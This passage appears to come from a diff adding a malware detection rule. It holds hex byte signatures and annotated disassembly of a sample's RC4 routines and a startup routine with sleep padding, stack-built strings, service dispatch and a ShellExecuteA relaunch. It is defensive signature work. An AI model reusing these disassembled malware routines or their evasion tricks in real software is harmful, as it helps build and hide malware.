?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8D 86 ?? ?? ?? ?? 6A 00 50 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8B 8E ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A 00 FF D7 8B 96 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D7 C7 86 ?? ?? ?? ?? FF FF FF FF 5F 5E 59 C3 } + /* +function at 0x00404950@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - encrypt data using RC4 KSA + .text:0x00404950 + .text:0x00404950 FUNC: int stdcall sub_00404950( int arg0, int arg1, int arg2, ) [4 XREFS] + .text:0x00404950 + .text:0x00404950 Stack Variables: (offset from initial top of stack) + .text:0x00404950 12: int arg2 + .text:0x00404950 8: int arg1 + .text:0x00404950 4: int arg0 + .text:0x00404950 -1020: int local1020 + .text:0x00404950 -1024: int local1024 + .text:0x00404950 + .text:0x00404950 81ec00040000 sub esp,1024 + .text:0x00404956 53 push ebx + .text:0x00404957 55 push ebp + .text:0x00404958 56 push esi + .text:0x00404959 57 push edi + .text:0x0040495a 33db xor ebx,ebx + .text:0x0040495c 33f6 xor esi,esi + .text:0x0040495e b9ff000000 mov ecx,255 + .text:0x00404963 33c0 xor eax,eax + .text:0x00404965 8d7c2414 lea edi,dword [esp + 20] + .text:0x00404969 895c2410 mov dword [esp + 16],ebx + .text:0x0040496d f3ab rep: stosd + .text:0x0040496f 8b8c2414040000 mov ecx,dword [esp + 1044] + .text:0x00404976 8d7c2410 lea edi,dword [esp + 16] + .text:0x0040497a loc_0040497a: [1 XREFS] + .text:0x0040497a 8bc3 mov eax,ebx + .text:0x0040497c 33d2 xor edx,edx + .text:0x0040497e f7b4241c040000 div dword [esp + 1052] + .text:0x00404985 8bac2418040000 mov ebp,dword [esp + 1048] + .text:0x0040498c 33c0 xor eax,eax + .text:0x0040498e 881c0b mov byte [ebx + ecx],bl + .text:0x00404991 43 inc ebx + .text:0x00404992 83c704 add edi,4 + .text:0x00404995 81fb00010000 cmp ebx,256 + .text:0x0040499b 8a042a mov al,byte [edx + ebp] + .text:0x0040499e 8947fc mov dword [edi - 4],eax + .text:0x004049a1 7cd7 jl 0x0040497a + .text:0x004049a3 33c0 xor eax,eax + .text:0x004049a5 8d7c2410 lea edi,dword [esp + 16] + .text:0x004049a9 loc_004049a9: [1 XREFS] + .text:0x004049a9 8a1408 mov dl,byte [eax + ecx] + .text:0x004049ac 8b2f mov ebp,dword [edi] + .text:0x004049ae 8bda mov ebx,edx + .text:0x004049b0 81e3ff000000 and ebx,255 + .text:0x004049b6 03dd add ebx,ebp + .text:0x004049b8 03f3 add esi,ebx + .text:0x004049ba 81e6ff000080 and esi,0x800000ff + .text:0x004049c0 7908 jns 0x004049ca + .text:0x004049c2 4e dec esi + .text:0x004049c3 81ce00ffffff or esi,0xffffff00 + .text:0x004049c9 46 inc esi + .text:0x004049ca loc_004049ca: [1 XREFS] + .text:0x004049ca 8a1c0e mov bl,byte [esi + ecx] + .text:0x004049cd 83c704 add edi,4 + .text:0x004049d0 881c08 mov byte [eax + ecx],bl + .text:0x004049d3 40 inc eax + .text:0x004049d4 3d00010000 cmp eax,256 + .text:0x004049d9 88140e mov byte [esi + ecx],dl + .text:0x004049dc 7ccb jl 0x004049a9 + .text:0x004049de 5f pop edi + .text:0x004049df 5e pop esi + .text:0x004049e0 5d pop ebp + .text:0x004049e1 5b pop ebx + .text:0x004049e2 81c400040000 add esp,1024 + .text:0x004049e8 c20c00 ret 12 + */ + $c28 = { 81 EC 00 04 00 00 53 55 56 57 33 DB 33 F6 B9 FF 00 00 00 33 C0 8D 7C 24 ?? 89 5C 24 ?? F3 AB 8B 8C 24 ?? ?? ?? ?? 8D 7C 24 ?? 8B C3 33 D2 F7 B4 24 ?? ?? ?? ?? 8B AC 24 ?? ?? ?? ?? 33 C0 88 1C 0B 43 83 C7 04 81 FB 00 01 00 00 8A 04 2A 89 47 ?? 7C ?? 33 C0 8D 7C 24 ?? 8A 14 08 8B 2F 8B DA 81 E3 FF 00 00 00 03 DD 03 F3 81 E6 FF 00 00 80 79 ?? 4E 81 CE 00 FF FF FF 46 8A 1C 0E 83 C7 04 88 1C 08 40 3D 00 01 00 00 88 14 0E 7C ?? 5F 5E 5D 5B 81 C4 00 04 00 00 C2 0C 00 } + /* +function at 0x004049f0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - encrypt data using RC4 PRGA + .text:0x004049f0 + .text:0x004049f0 FUNC: int stdcall sub_004049f0( int arg0, int arg1, int arg2, ) [8 XREFS] + .text:0x004049f0 + .text:0x004049f0 Stack Variables: (offset from initial top of stack) + .text:0x004049f0 12: int arg2 + .text:0x004049f0 8: int arg1 + .text:0x004049f0 4: int arg0 + .text:0x004049f0 + .text:0x004049f0 8b44240c mov eax,dword [esp + 12] + .text:0x004049f4 56 push esi + .text:0x004049f5 57 push edi + .text:0x004049f6 33c9 xor ecx,ecx + .text:0x004049f8 33f6 xor esi,esi + .text:0x004049fa 33ff xor edi,edi + .text:0x004049fc 85c0 test eax,eax + .text:0x004049fe 767c jbe 0x00404a7c + .text:0x00404a00 8b44240c mov eax,dword [esp + 12] + .text:0x00404a04 53 push ebx + .text:0x00404a05 55 push ebp + .text:0x00404a06 8b6c2418 mov ebp,dword [esp + 24] + .text:0x00404a0a loc_00404a0a: [1 XREFS] + .text:0x00404a0a 41 inc ecx + .text:0x00404a0b 81e1ff000080 and ecx,0x800000ff + .text:0x00404a11 7908 jns 0x00404a1b + .text:0x00404a13 49 dec ecx + .text:0x00404a14 81c900ffffff or ecx,0xffffff00 + .text:0x00404a1a 41 inc ecx + .text:0x00404a1b loc_00404a1b: [1 XREFS] + .text:0x00404a1b 8a1401 mov dl,byte [ecx + eax] + .text:0x00404a1e 8bda mov ebx,edx + .text:0x00404a20 81e3ff000000 and ebx,255 + .text:0x00404a26 03f3 add esi,ebx + .text:0x00404a28 81e6ff000080 and esi,0x800000ff + .text:0x00404a2e 7908 jns 0x00404a38 + .text:0x00404a30 4e dec esi + .text:0x00404a31 81ce00ffffff or esi,0xffffff00 + .text:0x00404a37 46 inc esi + .text:0x00404a38 loc_00404a38: [1 XREFS] + .text:0x00404a38 8a1c06 mov bl,byte [esi + eax] + .text:0x00404a3b 88542418 mov byte [esp + 24],dl + .text:0x00404a3f 881c01 mov byte [ecx + eax],bl + .text:0x00404a42 8b5c2418 mov ebx,dword [esp + 24] + .text:0x00404a46 881406 mov byte [esi + eax],dl + .text:0x00404a49 33d2 xor edx,edx + .text:0x00404a4b 8a1401 mov dl,byte [ecx + eax] + .text:0x00404a4e 81e3ff000000 and ebx,255 + .text:0x00404a54 03d3 add edx,ebx + .text:0x00404a56 81e2ff000080 and edx,0x800000ff + .text:0x00404a5c 7908 jns 0x00404a66 + .text:0x00404a5e 4a dec edx + .text:0x00404a5f 81ca00ffffff or edx,0xffffff00 + .text:0x00404a65 42 inc edx + .text:0x00404a66 loc_00404a66: [1 XREFS] + .text:0x00404a66 8a1402 mov dl,byte [edx + eax] + .text:0x00404a69 8a1c2f mov bl,byte [edi + ebp] + .text:0x00404a6c 32da xor bl,dl + .text:0x00404a6e 8b54241c mov edx,dword [esp + 28] + .text:0x00404a72 881c2f mov byte [edi + ebp],bl + .text:0x00404a75 47 inc edi + .text:0x00404a76 3bfa cmp edi,edx + .text:0x00404a78 7290 jc 0x00404a0a + .text:0x00404a7a 5d pop ebp + .text:0x00404a7b 5b pop ebx + .text:0x00404a7c loc_00404a7c: [1 XREFS] + .text:0x00404a7c 5f pop edi + .text:0x00404a7d 5e pop esi + .text:0x00404a7e c20c00 ret 12 + */ + $c29 = { 8B 44 24 ?? 56 57 33 C9 33 F6 33 FF 85 C0 76 ?? 8B 44 24 ?? 53 55 8B 6C 24 ?? 41 81 E1 FF 00 00 80 79 ?? 49 81 C9 00 FF FF FF 41 8A 14 01 8B DA 81 E3 FF 00 00 00 03 F3 81 E6 FF 00 00 80 79 ?? 4E 81 CE 00 FF FF FF 46 8A 1C 06 88 54 24 ?? 88 1C 01 8B 5C 24 ?? 88 14 06 33 D2 8A 14 01 81 E3 FF 00 00 00 03 D3 81 E2 FF 00 00 80 79 ?? 4A 81 CA 00 FF FF FF 42 8A 14 02 8A 1C 2F 32 DA 8B 54 24 ?? 88 1C 2F 47 3B FA 72 ?? 5D 5B 5F 5E C2 0C 00 } + /* +function at 0x00406f60@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - query environment variable + .text:0x00406f60 + .text:0x00406f60 FUNC: int stdcall sub_00406f60( int arg0, int arg1, int arg2, int arg3, ) [2 XREFS] + .text:0x00406f60 + .text:0x00406f60 Stack Variables: (offset from initial top of stack) + .text:0x00406f60 16: int arg3 + .text:0x00406f60 12: int arg2 + .text:0x00406f60 8: int arg1 + .text:0x00406f60 4: int arg0 + .text:0x00406f60 -7: int local7 + .text:0x00406f60 -8: int local8 + .text:0x00406f60 -9: int local9 + .text:0x00406f60 -10: int local10 + .text:0x00406f60 -11: int local11 + .text:0x00406f60 -12: int local12 + .text:0x00406f60 -14: int local14 + .text:0x00406f60 -15: int local15 + .text:0x00406f60 -16: int local16 + .text:0x00406f60 -20: int local20 + .text:0x00406f60 -21: int local21 + .text:0x00406f60 -22: int local22 + .text:0x00406f60 -23: int local23 + .text:0x00406f60 -24: int local24 + .text:0x00406f60 -25: int local25 + .text:0x00406f60 -26: int local26 + .text:0x00406f60 -27: int local27 + .text:0x00406f60 -28: int local28 + .text:0x00406f60 -29: int local29 + .text:0x00406f60 -30: int local30 + .text:0x00406f60 -31: int local31 + .text:0x00406f60 -32: int local32 + .text:0x00406f60 -36: int local36 + .text:0x00406f60 -37: int local37 + .text:0x00406f60 -38: int local38 + .text:0x00406f60 -39: int local39 + .text:0x00406f60 -40: int local40 + .text:0x00406f60 -43: int local43 + .text:0x00406f60 -44: int local44 + .text:0x00406f60 -45: int local45 + .text:0x00406f60 -46: int local46 + .text:0x00406f60 -47: int local47 + .text:0x00406f60 -48: int local48 + .text:0x00406f60 -76: int local76 + .text:0x00406f60 -335: int local335 + .text:0x00406f60 -336: int local336 + .text:0x00406f60 -595: int local595 + .text:0x00406f60 -596: int local596 + .text:0x00406f60 -855: int local855 + .text:0x00406f60 -856: int local856 + .text:0x00406f60 -1879: int local1879 + .text:0x00406f60 -1880: int local1880 + .text:0x00406f60 + .text:0x00406f60 55 push ebp + .text:0x00406f61 8bec mov ebp,esp + .text:0x00406f63 81ec54070000 sub esp,1876 + .text:0x00406f69 53 push ebx + .text:0x00406f6a 56 push esi + .text:0x00406f6b 8b3578904000 mov esi,dword [0x00409078] + .text:0x00406f71 33db xor ebx,ebx + .text:0x00406f73 57 push edi + .text:0x00406f74 53 push ebx + .text:0x00406f75 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406f77 53 push ebx + .text:0x00406f78 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406f7a 90 nop + .text:0x00406f7b 90 nop + .text:0x00406f7c 90 nop + .text:0x00406f7d 90 nop + .text:0x00406f7e 90 nop + .text:0x00406f7f 90 nop + .text:0x00406f80 90 nop + .text:0x00406f81 90 nop + .text:0x00406f82 90 nop + .text:0x00406f83 53 push ebx + .text:0x00406f84 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406f86 90 nop + .text:0x00406f87 53 push ebx + .text:0x00406f88 53 push ebx + .text:0x00406f89 53 push ebx + .text:0x00406f8a ff1514914000 call dword [0x00409114] ;kernel32.GetCurrentThreadId() + .text:0x00406f90 50 push eax + .text:0x00406f91 ff15c8914000 call dword [0x004091c8] ;user32.PostThreadMessageA(kernel32.GetCurrentThreadId(),0,0,0) + .text:0x00406f97 53 push ebx + .text:0x00406f98 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406f9a 90 nop + .text:0x00406f9b ff15cc914000 call dword [0x004091cc] ;user32.GetInputState() + .text:0x00406fa1 53 push ebx + .text:0x00406fa2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406fa4 90 nop + .text:0x00406fa5 53 push ebx + .text:0x00406fa6 53 push ebx + .text:0x00406fa7 8d45b8 lea eax,dword [ebp - 72] + .text:0x00406faa 53 push ebx + .text:0x00406fab 50 push eax + .text:0x00406fac ff15d0914000 call dword [0x004091d0] ;user32.GetMessageA(local76,0,0,0) + .text:0x00406fb2 53 push ebx + .text:0x00406fb3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406fb5 90 nop + .text:0x00406fb6 b9ff000000 mov ecx,255 + .text:0x00406fbb 33c0 xor eax,eax + .text:0x00406fbd 8dbdadf8ffff lea edi,dword [ebp - 1875] + .text:0x00406fc3 889dacf8ffff mov byte [ebp - 1876],bl + .text:0x00406fc9 f3ab rep: stosd + .text:0x00406fcb 66ab stosd + .text:0x00406fcd 6854030000 push 852 + .text:0x00406fd2 6818a24000 push 0x0040a218 + .text:0x00406fd7 aa stosb + .text:0x00406fd8 e8b3fcffff call 0x00406c90 ;sub_00406c90(0x0040a218,852) + .text:0x00406fdd 689a010000 push 410 + .text:0x00406fe2 6878a04000 push 0x0040a078 + .text:0x00406fe7 e8a4fcffff call 0x00406c90 ;sub_00406c90(0x0040a078,410) + .text:0x00406fec 6a01 push 1 + .text:0x00406fee e8bdf8ffff call 0x004068b0 ;sub_004068b0(1) + .text:0x00406ff3 83c414 add esp,20 + .text:0x00406ff6 85c0 test eax,eax + .text:0x00406ff8 7420 jz 0x0040701a + .text:0x00406ffa 53 push ebx + .text:0x00406ffb ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406ffd 90 nop + .text:0x00406ffe 391d5ca54000 cmp dword [0x0040a55c],ebx + .text:0x00407004 7405 jz 0x0040700b + .text:0x00407006 e815e9ffff call 0x00405920 ;sub_00405920() + .text:0x0040700b loc_0040700b: [1 XREFS] + .text:0x0040700b 53 push ebx + .text:0x0040700c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040700e 90 nop + .text:0x0040700f 5f pop edi + .text:0x00407010 5e pop esi + .text:0x00407011 33c0 xor eax,eax + .text:0x00407013 5b pop ebx + .text:0x00407014 8be5 mov esp,ebp + .text:0x00407016 5d pop ebp + .text:0x00407017 c21000 ret 16 + .text:0x0040701a loc_0040701a: [1 XREFS] + .text:0x0040701a b940000000 mov ecx,64 + .text:0x0040701f 33c0 xor eax,eax + .text:0x00407021 8dbdb5feffff lea edi,dword [ebp - 331] + .text:0x00407027 c685b4feffff00 mov byte [ebp - 332],0 + .text:0x0040702e f3ab rep: stosd + .text:0x00407030 66ab stosd + .text:0x00407032 53 push ebx + .text:0x00407033 aa stosb + .text:0x00407034 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407036 8d8db4feffff lea ecx,dword [ebp - 332] + .text:0x0040703c 6804010000 push 260 + .text:0x00407041 51 push ecx + .text:0x00407042 68fca34000 push 0x0040a3fc + .text:0x00407047 ff1534914000 call dword [0x00409134] ;kernel32.ExpandEnvironmentStringsA(0x0040a3fc,local336,260) + .text:0x0040704d 53 push ebx + .text:0x0040704e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407050 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407056 8d95b4feffff lea edx,dword [ebp - 332] + .text:0x0040705c 52 push edx + .text:0x0040705d 68fca34000 push 0x0040a3fc + .text:0x00407062 e809d7ffff call 0x00404770 ;sub_00404770(0x0040a3fc,local336) + .text:0x00407067 53 push ebx + .text:0x00407068 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040706a 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407070 68fca34000 push 0x0040a3fc + .text:0x00407075 e876d6ffff call 0x004046f0 ;sub_004046f0(0x0040a3fc) + .text:0x0040707a 80b8fba340005c cmp byte [eax + 0x0040a3fb],92 + .text:0x00407081 7517 jnz 0x0040709a + .text:0x00407083 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407089 68fca34000 push 0x0040a3fc + .text:0x0040708e e85dd6ffff call 0x004046f0 ;sub_004046f0(0x0040a3fc) + .text:0x00407093 c680fba3400000 mov byte [eax + 0x0040a3fb],0 + .text:0x0040709a loc_0040709a: [1 XREFS] + .text:0x0040709a 53 push ebx + .text:0x0040709b c645f825 mov byte [ebp - 8],37 + .text:0x0040709f c645f973 mov byte [ebp - 7],115 + .text:0x004070a3 c645fa5c mov byte [ebp - 6],92 + .text:0x004070a7 c645fb25 mov byte [ebp - 5],37 + .text:0x004070ab c645fc73 mov byte [ebp - 4],115 + .text:0x004070af c645fd00 mov byte [ebp - 3],0 + .text:0x004070b3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004070b5 6860a44000 push 0x0040a460 + .text:0x004070ba 8d45f8 lea eax,dword [ebp - 8] + .text:0x004070bd 68fca34000 push 0x0040a3fc + .text:0x004070c2 50 push eax + .text:0x004070c3 68d8aa4000 push 0x0040aad8 + .text:0x004070c8 e8f30d0000 call 0x00407ec0 ;msvcrt.sprintf(0x0040aad8,local12) + .text:0x004070cd 83c410 add esp,16 + .text:0x004070d0 53 push ebx + .text:0x004070d1 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004070d3 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004070d9 68e0a04000 push 0x0040a0e0 + .text:0x004070de 6834ac4000 push 0x0040ac34 + .text:0x004070e3 e888d6ffff call 0x00404770 ;sub_00404770(0x0040ac34,0x0040a0e0) + .text:0x004070e8 53 push ebx + .text:0x004070e9 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004070eb 391d68a54000 cmp dword [0x0040a568],ebx + .text:0x004070f1 7405 jz 0x004070f8 + .text:0x004070f3 e8b8fcffff call 0x00406db0 ;sub_00406db0() + .text:0x004070f8 loc_004070f8: [1 XREFS] + .text:0x004070f8 a060a54000 mov al,byte [0x0040a560] + .text:0x004070fd 84c0 test al,al + .text:0x004070ff 0f840a020000 jz 0x0040730f + .text:0x00407105 b940000000 mov ecx,64 + .text:0x0040710a 33c0 xor eax,eax + .text:0x0040710c 8dbdadfcffff lea edi,dword [ebp - 851] + .text:0x00407112 c685acfcffff00 mov byte [ebp - 852],0 + .text:0x00407119 f3ab rep: stosd + .text:0x0040711b 66ab stosd + .text:0x0040711d 53 push ebx + .text:0x0040711e aa stosb + .text:0x0040711f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407121 8d8dacfcffff lea ecx,dword [ebp - 852] + .text:0x00407127 6804010000 push 260 + .text:0x0040712c 51 push ecx + .text:0x0040712d 53 push ebx + .text:0x0040712e ff1538914000 call dword [0x00409138] ;kernel32.GetModuleFileNameA(0,local856,260) + .text:0x00407134 53 push ebx + .text:0x00407135 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407137 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x0040713d 8d95acfcffff lea edx,dword [ebp - 852] + .text:0x00407143 68d8aa4000 push 0x0040aad8 + .text:0x00407148 52 push edx + .text:0x00407149 e8b2d6ffff call 0x00404800 ;sub_00404800(0,local856,0x0040aad8) + .text:0x0040714e 85c0 test eax,eax + .text:0x00407150 757e jnz 0x004071d0 + .text:0x00407152 a060a54000 mov al,byte [0x0040a560] + .text:0x00407157 66c70510ac400003 mov word [0x0040ac10],3 + .text:0x00407160 3c02 cmp al,2 + .text:0x00407162 755c jnz 0x004071c0 + .text:0x00407164 53 push ebx + .text:0x00407165 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407167 53 push ebx + .text:0x00407168 c745e418a24000 mov dword [ebp - 28],0x0040a218 + .text:0x0040716f c745e8a06d4000 mov dword [ebp - 24],0x00406da0 + .text:0x00407176 895dec mov dword [ebp - 20],ebx + .text:0x00407179 895df0 mov dword [ebp - 16],ebx + .text:0x0040717c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040717e 53 push ebx + .text:0x0040717f 66c70510ac400001 mov word [0x0040ac10],1 + .text:0x00407188 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040718a 90 nop + .text:0x0040718b 68f4010000 push 500 + .text:0x00407190 ffd6 call esi ;kernel32.Sleep(500) + .text:0x00407192 53 push ebx + .text:0x00407193 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407195 8b3d24904000 mov edi,dword [0x00409024] + .text:0x0040719b 8d45e4 lea eax,dword [ebp - 28] + .text:0x0040719e 50 push eax + .text:0x0040719f ffd7 call edi ;advapi32.StartServiceCtrlDispatcherA(local32) + .text:0x004071a1 53 push ebx + .text:0x004071a2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004071a4 68e8030000 push 1000 + .text:0x004071a9 ffd6 call esi ;kernel32.Sleep(1000) + .text:0x004071ab 53 push ebx + .text:0x004071ac ffd6 call esi ;kernel32.Sleep(0) + .text:0x004071ae 8d4de4 lea ecx,dword [ebp - 28] + .text:0x004071b1 51 push ecx + .text:0x004071b2 ffd7 call edi ;advapi32.StartServiceCtrlDispatcherA(local32) + .text:0x004071b4 53 push ebx + .text:0x004071b5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004071b7 66c70510ac400002 mov word [0x0040ac10],2 + .text:0x004071c0 loc_004071c0: [1 XREFS] + .text:0x004071c0 e8abfbffff call 0x00406d70 ;sub_00406d70(0,local856) + .text:0x004071c5 5f pop edi + .text:0x004071c6 5e pop esi + .text:0x004071c7 33c0 xor eax,eax + .text:0x004071c9 5b pop ebx + .text:0x004071ca 8be5 mov esp,ebp + .text:0x004071cc 5d pop ebp + .text:0x004071cd c21000 ret 16 + .text:0x004071d0 loc_004071d0: [1 XREFS] + .text:0x004071d0 6a00 push 0 + .text:0x004071d2 895df4 mov dword [ebp - 12],ebx + .text:0x004071d5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004071d7 b940000000 mov ecx,64 + .text:0x004071dc 33c0 xor eax,eax + .text:0x004071de 8dbdb1fdffff lea edi,dword [ebp - 591] + .text:0x004071e4 c685b0fdffff00 mov byte [ebp - 592],0 + .text:0x004071eb f3ab rep: stosd + .text:0x004071ed 66ab stosd + .text:0x004071ef 6a00 push 0 + .text:0x004071f1 c645d425 mov byte [ebp - 44],37 + .text:0x004071f5 c645d573 mov byte [ebp - 43],115 + .text:0x004071f9 c645d65c mov byte [ebp - 42],92 + .text:0x004071fd c645d725 mov byte [ebp - 41],37 + .text:0x00407201 c645d873 mov byte [ebp - 40],115 + .text:0x00407205 c645d900 mov byte [ebp - 39],0 + .text:0x00407209 aa stosb + .text:0x0040720a ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040720c 6860a44000 push 0x0040a460 + .text:0x00407211 8d55d4 lea edx,dword [ebp - 44] + .text:0x00407214 68fca34000 push 0x0040a3fc + .text:0x00407219 8d85b0fdffff lea eax,dword [ebp - 592] + .text:0x0040721f 52 push edx + .text:0x00407220 50 push eax + .text:0x00407221 e89a0c0000 call 0x00407ec0 ;msvcrt.sprintf(local596,local48) + .text:0x00407226 6892a44000 push 0x0040a492 + .text:0x0040722b 6818a24000 push 0x0040a218 + .text:0x00407230 e8ebc2ffff call 0x00403520 ;sub_00403520(msvcrt.sprintf(local596,local48),local48,64,0x0040a218,0x0040a492) + .text:0x00407235 6818a24000 push 0x0040a218 + .text:0x0040723a e811f4ffff call 0x00406650 ;sub_00406650(0x0040a218) + .text:0x0040723f 83c41c add esp,28 + .text:0x00407242 6a00 push 0 + .text:0x00407244 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407246 68fca24000 push 0x0040a2fc + .text:0x0040724b 687ca24000 push 0x0040a27c + .text:0x00407250 8d8db0fdffff lea ecx,dword [ebp - 592] + .text:0x00407256 6818a24000 push 0x0040a218 + .text:0x0040725b 51 push ecx + .text:0x0040725c e88f010000 call 0x004073f0 ;sub_004073f0(local596,0x0040a218,0x0040a27c,0x0040a2fc) + .text:0x00407261 8b3dac914000 mov edi,dword [0x004091ac] + .text:0x00407267 83c410 add esp,16 + .text:0x0040726a loc_0040726a: [2 XREFS] + .text:0x0040726a 6a00 push 0 + .text:0x0040726c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040726e 6860a44000 push 0x0040a460 + .text:0x00407273 e8f8060000 call 0x00407970 ;sub_00407970(0x0040a460) + .text:0x00407278 83c404 add esp,4 + .text:0x0040727b 85c0 test eax,eax + .text:0x0040727d 754e jnz 0x004072cd + .text:0x0040727f 8b45f4 mov eax,dword [ebp - 12] + .text:0x00407282 40 inc eax + .text:0x00407283 3db80b0000 cmp eax,3000 + .text:0x00407288 8945f4 mov dword [ebp - 12],eax + .text:0x0040728b 72dd jc 0x0040726a + .text:0x0040728d 6a00 push 0 + .text:0x0040728f c745f400000000 mov dword [ebp - 12],0 + .text:0x00407296 c645dc6f mov byte [ebp - 36],111 + .text:0x0040729a c645dd70 mov byte [ebp - 35],112 + .text:0x0040729e c645de65 mov byte [ebp - 34],101 + .text:0x004072a2 c645df6e mov byte [ebp - 33],110 + .text:0x004072a6 c645e000 mov byte [ebp - 32],0 + .text:0x004072aa ffd6 call esi ;kernel32.Sleep(0) + .text:0x004072ac 6a05 push 5 + .text:0x004072ae 6a00 push 0 + .text:0x004072b0 8d95b0fdffff lea edx,dword [ebp - 592] + .text:0x004072b6 6a00 push 0 + .text:0x004072b8 8d45dc lea eax,dword [ebp - 36] + .text:0x004072bb 52 push edx + .text:0x004072bc 50 push eax + .text:0x004072bd 6a00 push 0 + .text:0x004072bf ffd7 call edi ;shell32.ShellExecuteA(0,local40,local596,0,0,5) + .text:0x004072c1 6a00 push 0 + .text:0x004072c3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004072c5 43 inc ebx + .text:0x004072c6 83fb03 cmp ebx,3 + .text:0x004072c9 7335 jnc 0x00407300 + .text:0x004072cb eb9d jmp 0x0040726a + .text:0x004072cd loc_004072cd: [1 XREFS] + .text:0x004072cd 6a00 push 0 + .text:0x004072cf ffd6 call esi ;kernel32.Sleep(0) + .text:0x004072d1 803d60a5400001 cmp byte [0x0040a560],1 + .text:0x004072d8 7514 jnz 0x004072ee + .text:0x004072da 8d8db0fdffff lea ecx,dword [ebp - 592] + .text:0x004072e0 51 push ecx + .text:0x004072e1 6818a24000 push 0x0040a218 + .text:0x004072e6 e8f5e3ffff call 0x004056e0 ;sub_004056e0(0x0040a218,local596) + .text:0x004072eb 83c408 add esp,8 + .text:0x004072ee loc_004072ee: [1 XREFS] + .text:0x004072ee 6a00 push 0 + .text:0x004072f0 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004072f2 a15ca54000 mov eax,dword [0x0040a55c] + .text:0x004072f7 85c0 test eax,eax + .text:0x004072f9 7405 jz 0x00407300 + .text:0x004072fb e820e6ffff call 0x00405920 ;sub_00405920() + .text:0x00407300 loc_00407300: [2 XREFS] + .text:0x00407300 6a00 push 0 + .text:0x00407302 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407304 5f pop edi + .text:0x00407305 5e pop esi + .text:0x00407306 33c0 xor eax,eax + .text:0x00407308 5b pop ebx + .text:0x00407309 8be5 mov esp,ebp + .text:0x0040730b 5d pop ebp + .text:0x0040730c c21000 ret 16 + .text:0x0040730f loc_0040730f: [1 XREFS] + .text:0x0040730f 53 push ebx + .text:0x00407310 c645f425 mov byte [ebp - 12],37 + .text:0x00407314 c645f573 mov byte [ebp - 11],115 + .text:0x00407318 c645f600 mov byte [ebp - 10],0 + .text:0x0040731c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040731e 8d55f4 lea edx,dword [ebp - 12] + .text:0x00407321 6818a24000 push 0x0040a218 + .text:0x00407326 52 push edx + .text:0x00407327 6818a24000 push 0x0040a218 + .text:0x0040732c e88f0b0000 call 0x00407ec0 ;msvcrt.sprintf(0x0040a218,local16) + .text:0x00407331 83c40c add esp,12 + .text:0x00407334 53 push ebx + .text:0x00407335 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407337 53 push ebx + .text:0x00407338 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040733a 53 push ebx + .text:0x0040733b c645e443 mov byte [ebp - 28],67 + .text:0x0040733f c645e56f mov byte [ebp - 27],111 + .text:0x00407343 c645e66e mov byte [ebp - 26],110 + .text:0x00407347 c645e76e mov byte [ebp - 25],110 + .text:0x0040734b c645e865 mov byte [ebp - 24],101 + .text:0x0040734f c645e963 mov byte [ebp - 23],99 + .text:0x00407353 c645ea74 mov byte [ebp - 22],116 + .text:0x00407357 c645eb47 mov byte [ebp - 21],71 + .text:0x0040735b c645ec72 mov byte [ebp - 20],114 + .text:0x0040735f c645ed6f mov byte [ebp - 19],111 + .text:0x00407363 c645ee75 mov byte [ebp - 18],117 + .text:0x00407367 c645ef70 mov byte [ebp - 17],112 + .text:0x0040736b c645f000 mov byte [ebp - 16],0 + .text:0x0040736f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407371 53 push ebx + .text:0x00407372 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407374 53 push ebx + .text:0x00407375 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407377 53 push ebx + .text:0x00407378 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040737a 8d85acf8ffff lea eax,dword [ebp - 1876] + .text:0x00407380 6800040000 push 1024 + .text:0x00407385 8d4de4 lea ecx,dword [ebp - 28] + .text:0x00407388 50 push eax + .text:0x00407389 51 push ecx + .text:0x0040738a 6818a24000 push 0x0040a218 + .text:0x0040738f e8ccdbffff call 0x00404f60 ;sub_00404f60(0x0040a218,local32,local1880,1024) + .text:0x00407394 83c410 add esp,16 + .text:0x00407397 53 push ebx + .text:0x00407398 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040739a 53 push ebx + .text:0x0040739b ffd6 call esi 